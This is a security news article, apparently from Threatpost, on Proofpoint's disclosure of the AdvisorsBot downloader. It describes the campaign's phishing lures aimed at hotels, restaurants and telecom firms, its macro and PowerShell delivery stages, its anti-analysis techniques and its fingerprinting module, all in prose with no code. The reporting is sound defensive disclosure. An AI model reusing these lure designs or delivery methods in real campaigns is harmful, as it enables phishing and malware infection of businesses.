A new downloader was disclosed today, sporting significant anti-analysis features and increasingly sophisticated distribution techniques.
Researchers at Proofpoint have been tracking the downloader as a first-stage payload in campaigns since May 2018. Dubbed AdvisorsBot (due to early command-and-control domains, all containing the word “advisors”), it has been targeting hotels, restaurants and telecom-sector victims.
“A majority of the targets were located in the United States, but we’ve observed this threat globally,” Chris Dawson, threat intelligence lead at Proofpoint, told Threatpost. “To date, the campaigns have targeted thousands of recipients.”
The research team said in a post Thursday that the campaigns use several themes in their email lures, including a “grievance” gambit.
These include an email targeting hotels that purport to be from hotel customers who claimed to have been “double charged;” these attach a .doc which is supposedly a hotel receipt.
Another is a lure targeting food-service locations, which claims to be from a customer who had food poisoning after eating at the restaurant. The email claims that the miffed customers’ attorney is preparing a lawsuit, and that they have attached a .doc containing a doctor’s opinion on the matter.
Finally, an email sent to telecommunications companies is more mainstream, claiming to be from a job-seeker and featuring a “CV/resume” .doc.
Once the victims clicked on the document, they were prompted to “Enable Content,” which in turn delivered a malicious macros. Interestingly, the bad actors behind the campaigns have evolving tactics around delivering the macros; in the May and June campaigns, for instance, the documents contained macros that executed a PowerShell command to download and execute AdvisorsBot.
However, later in August, the actor shifted tactics to use a macro to execute an initial PowerShell command, which in turn downloaded another PowerShell script. This script executed embedded shellcode that ran AdvisorsBot without writing it to disk.
Finally, on August 15, the actor made another major change and the macro instead downloaded and executed a PowerShell version of the AdvisorsBot payload, which researchers dubbed PoshAdvisor.
Once AdvisorsBot has been downloaded and executed, the malware uses HTTPS to communicate with the C&C server. That includes encoded data used to identify a victim with the SID and the CRC32 hash of the computer name.
Anti-Analysis and Modules
AdvisorsBot employs a number of anti-analysis features, as well as a modular component.
The malware uses junk code, like extra instructions, conditional statements and loops, to slow down reverse engineering. It also uses Windows API function hashing, which makes it harder to identify of the malware’s functionality.
The malware also features a basic system fingerprinting module. The modular nature allows cybercriminals to adapt the malware, adding capabilities as they become available or download additional modules post infection, researchers said. This tricky module takes a screenshot and base64 encodes it, extracts Microsoft Outlook account details, and runs an array of other various commands. The system fingerprinting module was also recently found on another downloader malware, dubbed Marap, which researchers detailed last week.
“AdvisorsBot, along with another similar but unrelated malware that we detailed last week, point to a growing trend of small, versatile malware that give actors flexibility to launch future attacks and identify systems of interest that may lend themselves to more significant compromise,” the researchers said in the post. “AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.”